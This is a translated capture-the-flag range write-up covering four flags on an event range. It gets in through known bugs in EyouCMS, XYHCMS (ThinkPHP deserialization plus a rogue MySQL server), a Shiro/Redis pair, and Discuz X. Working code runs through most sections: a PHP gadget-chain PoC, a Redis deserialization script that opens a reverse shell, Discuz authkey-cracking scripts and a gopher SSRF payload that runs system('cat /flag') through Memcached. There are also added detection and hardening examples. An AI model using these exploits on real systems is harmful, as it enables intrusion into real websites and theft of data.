Preface

First of all, thanks to Master Yue (月师傅) for hosting the Mid-Autumn Festival event; the range was well built and a lot of fun. Master Yue's blog: 渗透测试培训-网络安全培训-暗月博客 (moonsec.com). Thanks as well for the mooncakes he sent.

Walkthrough

First, port-scan 103.108.67.223 with goby (nmap was too slow).

FLAG1

http://103.108.67.223:8880/

At the very bottom of the site:

Copyright © 2012-2018 [some company] All rights reserved. Powered by EyouCms

EyouCms

File scanning

Hit it with N-days

Tried several vulnerabilities.

Ended up following Eyoucms V1.5.X 漏洞分析 - 徐野子 - 博客园 (cnblogs.com) (Eyoucms V1.5.X vulnerability analysis).

Brute-forced the token with a Go script; for some reason the Python version never cracked it.

Got a shell through the admin backend, but with very limited privileges. phpinfo showed a disable_functions restriction, and for some reason AntSword's bypass plugin couldn't get past it…

Releases · TarlogicSecurity/Chankro (github.com)

Tried the LD_PRELOAD bypass (Chankro), but it didn't succeed.

In the end I used .antproxy.php.

moonsec_flag{2f0460e434a10e8912cOef6f630add2c

FLAG2

http://103.108.67.223:8866/

Copyright © 2014-2020 XYHCMS. 行云海软件 All rights reserved. Power by XYHCMS

XYHCMS

Directory scan

There's an Install directory?? Not sure whether the install file had been removed. Searched for N-days.

The first hit:

痛失CVE之xyhcms(thinkphp3.2.3)反序列化 - FreeBuf网络安全行业门户 (Missing out on a CVE: XYHCMS (ThinkPHP 3.2.3) deserialization - FreeBuf)

The directory /App/Runtime/Data/config/ does not exist, but /App/Runtime/Data/ is browsable.

http://103.108.67.223:8866/App/Runtime/Data/d51694dcb61d76bef156076835ffd7e7_config/site.php

Found the key: TlRAcBF8e

Then ran the PoC to replace the nickname:

```php
<?php
// PoC from the referenced article. The POP chain is Imagick -> Memcache -> Model -> Db\Driver\Mysql:
// when the cookie is unserialized, the chain ends in a PDO MySQL connection that has
// MYSQL_ATTR_LOCAL_INFILE enabled, so the target connects out as a MySQL client.
namespace Think\Db\Driver;
use PDO;
class Mysql{
    protected $options = array(
        PDO::MYSQL_ATTR_LOCAL_INFILE => true
    );
    protected $config = array(
        "dsn" => "mysql:host=localhost;dbname=xyhcms;port=3306",
        "username" => "root",
        "password" => "root"
    );
}

namespace Think;
class Model{
    protected $options = array();
    protected $pk;
    protected $data = array();
    protected $db = null;
    public function __construct(){
        $this->db = new \Think\Db\Driver\Mysql();
        $this->options['where'] = '';
        $this->pk = 'luoke';
        $this->data[$this->pk] = array(
            "table" => "xyh_admin_log",
            "where" => "id=0"
        );
    }
}

namespace Think\Session\Driver;
class Memcache{
    protected $handle;
    public function __construct() {
        $this->handle = new \Think\Model();
    }
}

namespace Think\Image\Driver;
class Imagick{
    private $img;
    public function __construct() {
        $this->img = new \Think\Session\Driver\Memcache();
    }
}

namespace Common\Lib;
// SysCrypt as used by the CMS's cookie functions, so the cookie can be built with the leaked site key.
class SysCrypt{

    private $crypt_key;
    public function __construct($crypt_key) {
        $this->crypt_key = $crypt_key;
    }
    // XOR with a per-message md5(rand()) key, storing each key byte next to the byte it masks,
    // then XOR the whole thing with md5(crypt_key) and base64-encode it.
    public function php_encrypt($txt) {
        srand((double)microtime() * 1000000);
        $encrypt_key = md5(rand(0,32000));
        $ctr = 0;
        $tmp = '';
        for($i = 0;$i<strlen($txt);$i++) {
            $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
            $tmp .= $encrypt_key[$ctr].($txt[$i]^$encrypt_key[$ctr++]);
        }
        return base64_encode(self::__key($tmp,$this->crypt_key));
    }

    // Reverse of php_encrypt(): undo the outer XOR, then unmask each (key byte, data byte) pair.
    public function php_decrypt($txt) {
        $txt = self::__key(base64_decode($txt),$this->crypt_key);
        $tmp = '';
        for($i = 0;$i < strlen($txt); $i++) {
            $md5 = $txt[$i];
            $tmp .= $txt[++$i] ^ $md5;
        }
        return $tmp;
    }

    private function __key($txt,$encrypt_key) {
        $encrypt_key = md5($encrypt_key);
        $ctr = 0;
        $tmp = '';
        for($i = 0; $i < strlen($txt); $i++) {
            $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
            $tmp .= $txt[$i] ^ $encrypt_key[$ctr++];
        }
        return $tmp;
    }

    public function __destruct() {
        $this->crypt_key = null;
    }
}

function get_cookie($name, $key = '') {
    $key = '7q6Gw97sh';
    $key = md5($key);
    $sc = new \Common\Lib\SysCrypt($key);
    $value = $sc->php_decrypt($name);
    return unserialize($value);
}

// Build the cookie value: serialize the gadget object and encrypt it under md5(site key).
function set_cookie($args, $key = '') {
    $key = 'TlRAcBF8e';
    $value = serialize($args);
    $key = md5($key);
    $sc = new \Common\Lib\SysCrypt($key);
    $value = $sc->php_encrypt($value);
    return $value;
}

$b = new \Think\Image\Driver\Imagick();
$a = set_cookie($b,'');
echo str_replace('+','%2B',$a);
```

Using the PoC from the article, the statement executed successfully.
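Why the leaked key is enough to forge this cookie, shown with an added Python port of the SysCrypt scheme (my own code for analysis, not code from XYHCMS or from the article): the scheme is a plain XOR stream with no integrity check, so a cookie can be altered byte-by-byte without the key, and anyone holding the key can mint a cookie that reaches unserialize(). The block reimplements php_encrypt/php_decrypt, demonstrates the malleability, and adds a hypothetical HMAC-signed variant that rejects a tampered cookie before decryption. The site key TlRAcBF8e is the one found above; the MAC key and the serialized payload are constructed sample values.

```python
import base64
import hashlib
import hmac
import secrets


def _key_xor(data, crypt_key):
    """Port of SysCrypt::__key(): XOR each byte with the cycling 32-char hex digest of md5(crypt_key)."""
    stream = hashlib.md5(crypt_key.encode()).hexdigest().encode()
    return bytes(b ^ stream[i % len(stream)] for i, b in enumerate(data))


def php_encrypt(txt, crypt_key, encrypt_key=None):
    """Port of SysCrypt::php_encrypt(). PHP draws encrypt_key = md5(rand(0,32000)); every key byte is
    written out next to the byte it masks, so the only secret in the scheme is crypt_key."""
    if encrypt_key is None:
        encrypt_key = hashlib.md5(str(secrets.randbelow(32001)).encode()).hexdigest().encode()
    out = bytearray()
    for i, b in enumerate(txt):
        k = encrypt_key[i % len(encrypt_key)]
        out += bytes((k, b ^ k))
    return base64.b64encode(_key_xor(bytes(out), crypt_key)).decode()


def php_decrypt(enc, crypt_key):
    """Port of SysCrypt::php_decrypt(): strip the outer XOR, then unmask each (key, byte) pair."""
    raw = _key_xor(base64.b64decode(enc), crypt_key)
    return bytes(raw[i + 1] ^ raw[i] for i in range(0, len(raw) - 1, 2))


def flip_first_plaintext_bit(enc):
    """Tampering without the key: XOR is malleable, so flipping the low bit of ciphertext byte 1
    flips the low bit of plaintext byte 0, and php_decrypt() has no way to notice."""
    raw = bytearray(base64.b64decode(enc))
    raw[1] ^= 0x01
    return base64.b64encode(bytes(raw)).decode()


def sign_cookie(payload, crypt_key, mac_key):
    """Hypothetical hardening: append an HMAC over the encoded body."""
    body = php_encrypt(payload, crypt_key)
    tag = hmac.new(mac_key, body.encode(), hashlib.sha256).hexdigest()
    return body + "." + tag


def verify_cookie(cookie, crypt_key, mac_key):
    """Check the HMAC first; return None instead of ever handing a tampered value to unserialize()."""
    body, _, tag = cookie.rpartition(".")
    expected = hmac.new(mac_key, body.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(tag, expected):
        return None
    return php_decrypt(body, crypt_key)


# set_cookie() passes md5(site key) as crypt_key; the site key is the one leaked from site.php above.
SITE_KEY = "TlRAcBF8e"
CRYPT_KEY = hashlib.md5(SITE_KEY.encode()).hexdigest()
PAYLOAD = b'a:1:{s:4:"name";s:5:"guest";}'   # constructed PHP-serialized sample
MAC_KEY = b"constructed-server-side-mac-key"  # constructed; would live in server config

if __name__ == "__main__":
    cookie = php_encrypt(PAYLOAD, CRYPT_KEY)
    print("round trip     :", php_decrypt(cookie, CRYPT_KEY))
    print("tampered       :", php_decrypt(flip_first_plaintext_bit(cookie), CRYPT_KEY))
    signed = sign_cookie(PAYLOAD, CRYPT_KEY, MAC_KEY)
    body, _, tag = signed.rpartition(".")
    print("signed+tampered:", verify_cookie(flip_first_plaintext_bit(body) + "." + tag, CRYPT_KEY, MAC_KEY))
```

The tampered cookie decrypts to the same payload with its first byte changed (`a` becomes a backtick), which is exactly what a signature-less XOR scheme cannot detect; the signed variant returns None before any decryption happens.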

Then I also found the article xyhcms getshell - qq_42307546的博客 (CSDN).

But with Gifts/Rogue-MySql-Server: Rogue MySql Server (github.com) we can go straight for the flag. Only the configurable head of the script is shown below, with the file list pointed at /flag; the rest of the upstream script is unchanged:

```python
import socket
import asyncore
import asynchat
import struct
import random
import logging
import logging.handlers


PORT = 3306

log = logging.getLogger(__name__)

log.setLevel(logging.DEBUG)
tmp_format = logging.handlers.WatchedFileHandler('mysql.log', 'ab')
tmp_format.setFormatter(logging.Formatter("%(asctime)s:%(levelname)s:%(message)s"))
log.addHandler(
    tmp_format
)

filelist = (
    r'/flag',

)


#================================================
#=======No need to change after this lines=======
#================================================

__author__ = 'Gifts'
```

Result:

moonsec_flag{f54d2bdb1f8c6a7996b0a0bf373997fd}
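How the rogue server's file read looks on the wire, as an added example (my own code, not part of the Rogue-MySql-Server project or this writeup): once the target connects with LOCAL INFILE enabled, the server answers the client's first query with a LOCAL INFILE request packet (header byte 0xFB followed by the file name) and the client obligingly sends that file's contents. The Python below splits a server-to-client byte stream into MySQL packets and reports such requests; the packet bytes are constructed. A result-set row whose first column is NULL (which also starts with 0xFB) is included to show why the sequence-id check is needed. On the client side the fix is simply to leave PDO::MYSQL_ATTR_LOCAL_INFILE off, which is the attribute the gadget chain above turns on.

```python
LOCAL_INFILE_REQUEST = 0xFB  # header byte of the server's "send me this local file" packet


def iter_mysql_packets(stream):
    """Split a raw MySQL byte stream into (sequence_id, payload). A packet is a 3-byte little-endian
    payload length, a 1-byte sequence id, then the payload."""
    pos = 0
    while pos + 4 <= len(stream):
        length = int.from_bytes(stream[pos:pos + 3], "little")
        seq = stream[pos + 3]
        payload = stream[pos + 4:pos + 4 + length]
        if len(payload) != length:
            raise ValueError("truncated packet at offset %d" % pos)
        yield seq, payload
        pos += 4 + length


def find_local_infile_requests(server_stream):
    """Return the file names a server asked the client to upload. The client's command packet has
    sequence id 0, so the first packet of a response has sequence id 1; a 0xFB byte there can only be
    a LOCAL INFILE request. (0xFB deeper inside a result set just marks a NULL column and is ignored.)"""
    names = []
    for seq, payload in iter_mysql_packets(server_stream):
        if seq == 1 and payload and payload[0] == LOCAL_INFILE_REQUEST:
            names.append(payload[1:].decode("utf-8", "replace"))
    return names


# Constructed server->client bytes: an OK packet, a LOCAL INFILE request for /flag, and a text
# result-set row whose first column is NULL (starts with 0xFB, but carries sequence id 5).
OK_PACKET = b"\x07\x00\x00\x01" + b"\x00\x00\x00\x02\x00\x00\x00"
INFILE_REQUEST = b"\x06\x00\x00\x01" + b"\xfb/flag"
NULL_ROW = b"\x03\x00\x00\x05" + b"\xfb\x01x"
SAMPLE_STREAM = OK_PACKET + INFILE_REQUEST + NULL_ROW

if __name__ == "__main__":
    for name in find_local_infile_requests(SAMPLE_STREAM):
        print("server asked the client to send:", name)
```

Run against a capture of the client's outbound MySQL connections, a hit means the peer asked the client to upload a local file, which an honest server only does after the client itself issued LOAD DATA LOCAL.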

FLAG3

http://103.108.67.223:8089/

Shiro + Redis

Had done similar CTF challenges before.

Brute-forced the Redis password: abc123

Master Yue's earlier article seems to have covered this Shiro + Redis setup.

Reference: redis未授权到shiro反序列化 - 先知社区 (aliyun.com) (From unauthenticated Redis to Shiro deserialization)

Or use the following directly (cokeBeer's version didn't work for me):

```python
import pyyso
import socket

s = socket.socket()
s.connect(("127.0.0.1", 6379))
whatever = b"123"
key = b"shiro:session:" + whatever
# note: the command has to be wrapped as bash -c {...} and encoded; see the link below
value = pyyso.cb1v192("reverse shell command")
# SET <key> <value> sent as a raw RESP array: *3\r\n$3\r\nSET\r\n$<len>\r\n<key>\r\n$<len>\r\n<value>\r\n
s.send(b"\x2a\x33\x0d\x0a\x24\x33\x0d\x0aSET\r\n\x24" + str(len(key)).encode() + b"\r\n" + key + b"\r\n\x24" + str(len(value)).encode() + b"\r\n" + value + b"\r\n")
if b"+OK" in s.recv(3):
    print("success")
```

https://mp.weixin.qq.com/s/QvyVU6HXmxlfdkLwrH9vTw (Master Yue's earlier assessment write-up mentions it too)

Intercept the request, change the JSESSIONID, and the reverse shell comes back; read the flag. (If the shell doesn't connect, retry a few times, or after writing the key fall back to the usual Shiro approach.)

moonsec_flag{327a6c4304ad5938eaf0efb6cc3e53dc}
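What this attack leaves in the Redis traffic, and how to spot it, as an added detection example (my own code, not from the articles above): the script writes a Java-serialized blob under a shiro:session:* key, exactly like a legitimate session write, but the blob carries gadget-chain class names (the CommonsBeanutils1 chain behind pyyso.cb1v192 includes TemplatesImpl and BeanComparator) and not the SimpleSession class a real session object serializes to. The block decodes the RESP array format the script sends, and classifies each session SET. The stored values are constructed stand-ins (a Java stream header plus a class name), not real serialized objects, and the GADGET_CLASSES list is a starting point, not a complete one.

```python
JAVA_SERIAL_MAGIC = b"\xac\xed\x00\x05"
SESSION_CLASS = b"org.apache.shiro.session.mgt.SimpleSession"
# Classes used by known gadget chains (the CommonsBeanutils1 chain behind pyyso.cb1v192 among them);
# a genuine Shiro session object never references them.
GADGET_CLASSES = (
    b"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl",
    b"org.apache.commons.beanutils.BeanComparator",
    b"org.apache.commons.collections.functors.InvokerTransformer",
)


def resp_encode(*parts):
    """Encode one command as a RESP array of bulk strings (the wire format the script above sends)."""
    out = b"*%d\r\n" % len(parts)
    for part in parts:
        out += b"$%d\r\n%s\r\n" % (len(part), part)
    return out


def resp_decode(buf, pos=0):
    """Decode one RESP array of bulk strings starting at pos; returns (parts, next_pos)."""
    if buf[pos:pos + 1] != b"*":
        raise ValueError("expected RESP array at offset %d" % pos)
    end = buf.index(b"\r\n", pos)
    count, pos, parts = int(buf[pos + 1:end]), end + 2, []
    for _ in range(count):
        if buf[pos:pos + 1] != b"$":
            raise ValueError("expected bulk string at offset %d" % pos)
        end = buf.index(b"\r\n", pos)
        size = int(buf[pos + 1:end])
        pos = end + 2
        parts.append(buf[pos:pos + size])
        pos += size + 2
    return parts, pos


def inspect_set(parts):
    """Classify a command: only SET on a shiro:session:* key is of interest."""
    if len(parts) < 3 or parts[0].upper() != b"SET" or not parts[1].startswith(b"shiro:session:"):
        return None
    key, value = parts[1].decode(), parts[2]
    if not value.startswith(JAVA_SERIAL_MAGIC):
        return {"key": key, "verdict": "not java-serialized", "gadget_classes": []}
    hits = [c.decode() for c in GADGET_CLASSES if c in value]
    if hits or SESSION_CLASS not in value:
        return {"key": key, "verdict": "suspicious", "gadget_classes": hits}
    return {"key": key, "verdict": "normal session", "gadget_classes": []}


def scan_client_stream(buf):
    """Walk a captured client->Redis byte stream and return a verdict for every session write."""
    findings, pos = [], 0
    while pos < len(buf):
        parts, pos = resp_decode(buf, pos)
        verdict = inspect_set(parts)
        if verdict:
            findings.append(verdict)
    return findings


# Constructed stand-ins for stored values: a Java stream header followed by the class name a
# serialized object would carry. Neither is a real serialized object or a real gadget chain.
LEGIT_VALUE = JAVA_SERIAL_MAGIC + b"sr\x00\x2a" + SESSION_CLASS + b"\x00" * 8
GADGET_VALUE = JAVA_SERIAL_MAGIC + b"sr\x00\x3a" + GADGET_CLASSES[0] + b"\x00" * 8
SAMPLE_STREAM = (resp_encode(b"PING")
                 + resp_encode(b"SET", b"shiro:session:4f2c", LEGIT_VALUE)
                 + resp_encode(b"SET", b"shiro:session:123", GADGET_VALUE))

if __name__ == "__main__":
    for finding in scan_client_stream(SAMPLE_STREAM):
        print(finding)
```

Besides hunting in traffic, the same check applies to a SCAN of shiro:session:* keys on the server itself; either way the durable fix is a Redis password that survives a brute-force attempt, and a session DAO that does not hand arbitrary Java streams to ObjectInputStream.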

FLAG4

http://103.108.67.223:8822/forum.php

Powered by Discuz! X3.2

Hammered at this for over a day with no result; later saw Master Yue say in the group that it's all public.

Browse the files under the http://103.108.67.223:8822/install/ directory.

Under http://103.108.67.223:8822/install/data/ there is a database dump containing

('authkey','9f50c9zryqZt5FYA');

authkey?? Searched for related material.

References:

Discuz 搜索结果 - 像黑客一样学习 (hacking8.com)

VulWiki/Web安全/Discuz/Discuz! X < 3.4 authkey 算法的安全性漏洞.md at master · Ares-X/VulWiki (github.com)

DiscuzX3.3 authkey可爆破漏洞复现 - darkless (Discuz X3.3 brute-forceable authkey reproduction)

Checked other sites on FOFA: the sstr differs from site to site, while the cookie prefix is known, so remember to change it.

Mainly followed Discuz!-X-_-3.4-authkey-算法的安全性漏洞 - Discuz (hacking8.com)

```python
# coding=utf-8
# Builds the argument list for php_mt_seed: one "min max range_min range_max" group per
# mt_rand(0, 61) call made by Discuz's random(). The first w_len outputs (the authkey's
# random(10)) are unknown, so they get the full 0..61 range; the outputs after them are the
# known characters of the cookie prefix (sstr), so each is pinned to its index in str_list.
w_len = 10
result = ""
str_list = "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz"
length = len(str_list)
for i in range(w_len):
    # unknown output: any value in 0..61
    result += "0 {0} 0 {0} ".format(length - 1)
sstr = "t2xl"
for i in sstr:
    # known output: exactly this index, drawn from 0..61
    result += "{0} {0} 0 {1} ".format(str_list.index(i), length - 1)
print(result)
```

With the parameters produced, run the php_mt_seed tool:

https://github.com/ianxtianxt/php-mt_rand

Then generate the random strings from the recovered seeds:

```php
<?php
// Discuz's random(): one mt_rand(0, 61) per output character, so a recovered seed
// reproduces the exact string.
function random($length) {
    $hash = '';
    $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz';
    $max = strlen($chars) - 1;
    PHP_VERSION < '4.2.0' && mt_srand((double)microtime() * 1000000);
    for($i = 0; $i < $length; $i++) {
        $hash .= $chars[mt_rand(0, $max)];
    }
    return $hash;
}
// result.txt holds php_mt_seed's output ("seed = NNN" lines); write the 10-character
// string each candidate seed produces to result2.txt.
$fp = fopen('result.txt', 'rb');
$fp2 = fopen('result2.txt', 'wb');
while(!feof($fp)){
    $b = fgets($fp, 4096);
    if(preg_match("/seed = (\d+)/", $b, $matches)){
        $m = $matches[0];
    }else{
        continue;
    }
    // var_dump(substr($m,7));
    mt_srand((int)substr($m, 7));   // skip the "seed = " prefix
    fwrite($fp2, random(10)."\n");
}
fclose($fp);
fclose($fp2);
```

Note also that the parameters for https://www.openwall.com/php_mt_seed/ have to be generated as above, since its output is what fills in "result".

Finally, use:

```python
# coding=utf-8
import itertools
import hashlib
import time


def dsign(authkey):
    # The reset link's sign is the first 16 hex chars of md5(url + authkey).
    url = "url"            # site base URL (placeholder, as in the original)
    idstring = "vnY6nW"
    uid = 2
    uurl = "{}member.php?mod=getpasswd&uid={}&id={}".format(url, uid, idstring)
    url_md5 = hashlib.md5((uurl + authkey).encode())
    return url_md5.hexdigest()[:16]


def main():
    sign = "af3b937d0132a06b"
    str_list = "0123456789abcdef"
    with open('result2.txt') as f:
        ranlist = [s[:-1] for s in f]
    s_list = sorted(set(ranlist), key=ranlist.index)   # de-duplicate, keep file order
    r_list = itertools.product(str_list, repeat=6)     # the 6 hex chars in front of random(10)
    print("[!] start running....")
    s_time = time.time()
    for j in r_list:
        prefix = "".join(j)
        for s in s_list:
            authkey = prefix + s
            # print(dsign(authkey))
            if dsign(authkey) == sign:
                print("[*] found used time: " + str(time.time() - s_time))
                return "[*] authkey found: " + authkey


if __name__ == "__main__":
    print(main())
```

Later I found http://103.108.67.223:8822/config/config_global.php.bak

An information leak!??

```php
// -------------------------- CONFIG MEMORY  --------------------------- //
$_config['memory']['prefix'] = 'Wzj0Ps_';
$_config['memory']['redis']['server'] = '';
$_config['memory']['redis']['port'] = 6379;
$_config['memory']['redis']['pconnect'] = 1;
$_config['memory']['redis']['timeout'] = '0';
$_config['memory']['redis']['requirepass'] = '';
$_config['memory']['redis']['serializer'] = 1;
$_config['memory']['memcache']['server'] = '127.0.0.1';
$_config['memory']['memcache']['port'] = 11211;
$_config['memory']['memcache']['pconnect'] = 1;
$_config['memory']['memcache']['timeout'] = 1;
$_config['memory']['apc'] = 1;
$_config['memory']['xcache'] = 1;
$_config['memory']['eaccelerator'] = 1;
$_config['memory']['wincache'] = 1;
```

Also found a few more articles:

Discuz!-X-authkeyMemcachessrf-getshell - Discuz (hacking8.com)

Discuz!-X3.4-Memcached未授权访问导致的rce - Discuz (hacking8.com) (Discuz! X3.4 unauthenticated Memcached access leading to RCE)

PoC:

http://103.148.244.120:8822/forum.php?mod=ajax&action=downremoteimg&message=[img=1,1]http://www.oosec.cn/poc.php?a.jpg[/img]

Host this payload on your server so the target fetches it (poc.php):

```php
<?php
header("Location: gopher://localhost:11211/_set%20Wzj0Ps_setting%201%200%20162%0d%0aa%3A2%3A%7Bs%3A6%3A%22output%22%3Ba%3A1%3A%7Bs%3A4%3A%22preg%22%3Ba%3A2%3A%7Bs%3A6%3A%22search%22%3Ba%3A1%3A%7Bs%3A7%3A%22plugins%22%3Bs%3A5%3A%22%2F.*%2Fe%22%3B%7Ds%3A7%3A%22replace%22%3Ba%3A1%3A%7Bs%3A7%3A%22plugins%22%3Bs%3A9%3A%22cat%20/flag%22%3B%7D%7D%7Ds%3A13%3A%22rewritestatus%22%3Bi%3A1%3B%7D");
?>
```

The first attempt wasn't parsed; I hadn't noticed this line in the article:

```php
$payload['output']['preg']['search']['plugins']= "/.*/e";
```

/.*/e, that is, the e modifier: preg_replace() evaluates the replacement as PHP code, so a bare cat /flag is not valid PHP, while wrapping it in system() is.

So finally:

```php
<?php
header("Location: gopher://localhost:11211/_set%20Wzj0Ps_setting%201%200%20173%0D%0Aa%3A2%3A%7Bs%3A6%3A%22output%22%3Ba%3A1%3A%7Bs%3A4%3A%22preg%22%3Ba%3A2%3A%7Bs%3A6%3A%22search%22%3Ba%3A1%3A%7Bs%3A7%3A%22plugins%22%3Bs%3A5%3A%22%2F.*%2Fe%22%3B%7Ds%3A7%3A%22replace%22%3Ba%3A1%3A%7Bs%3A7%3A%22plugins%22%3Bs%3A19%3A%22system('cat%20%2Fflag')%22%3B%7D%7D%7Ds%3A13%3A%22rewritestatus%22%3Bi%3A1%3B%7D");
?>
```

Got the flag: moonsec_flag{ae5cbc768cb85f87e83e8fe75fbcd1eb}